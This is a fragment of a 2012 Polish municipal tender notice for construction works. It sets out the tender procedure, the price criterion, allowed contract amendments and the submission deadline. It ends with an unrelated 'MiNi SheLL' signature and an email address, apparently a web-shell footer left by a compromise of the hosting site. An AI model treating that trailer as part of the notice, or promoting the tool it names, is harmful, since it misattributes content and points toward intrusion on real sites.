<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących sytuacjach:
1.	Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
-  w przypadku odkrycia w gruncie, w czasie realizacji prac ziemnych, nie zinwentaryzowanych na mapie dc projektowych elementów uzbrojenia terenu lub innych, nie pozwalających na terminową realizację zleconych prac 
- w przypadku wystąpienia robót dodatkowych lub zamiennych, o czas potrzebny na realizacje tych robót
- w przypadku wystąpienia warunków atmosferycznych lub innych zdarzeń losowych niezależnych od wykonawcy nie pozwalających na wykonywanie robót budowlanych
- w przypadku zawieszenia robót z przyczyn niezależnych od wykonawcy
     2.   Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących 
           przypadkach:
          -  zmiana przepisów dotyczących płatności za prawidłową realizację zamówienia
          -  wykonanie prac zamiennych - o wartość tych prac 
          -  rezygnacji z części prac, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji 
             przedmiotu umowy - o wartość niewykonanych prac
         - konieczności zmiany technologii robót, w stosunku do technologii przewidzianej w 
            dokumentacji technicznej
3.	Inne zmiany:
  - w zakresie podwykonawstwa za uprzednią zgodą zamawiającego: powierzenie podwykonawcom innej części prac niż wskazana w ofercie wykonawcy, zmiana podwykonawcy na etapie realizacji robót budowlanych
- konieczności zmiany technologii robót, w stosunku do technologii przewidzianej w 
            dokumentacji technicznej, po uzgodnieniu pomiędzy Zamawiającym i Wykonawcą
- w zakresie zmiany kierownika budowy lub kierownika robot za uprzednią zgodą zamawiającego. Warunkiem koniecznym zaakceptowania nowego kierownika budowy/robót jest posiadanie przez niego uprawnień do kierowania robotami w zakresie koniecznym do prowadzenia prac.
4.	Warunki zmian:
- inicjowanie zmian - na wniosek wykonawcy lub zamawiającego
- uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót budowlanych
- forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starogardgd.ug.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Starogard Gdański
83-200 Starogard Gdański
ul. Sikorskiego 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2012 godzina 10:00, miejsce: Urząd Gminy Starogard Gdański,
83-200 Starogard Gdański
ul. Sikorskiego 9 (sekretariat) pok. 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com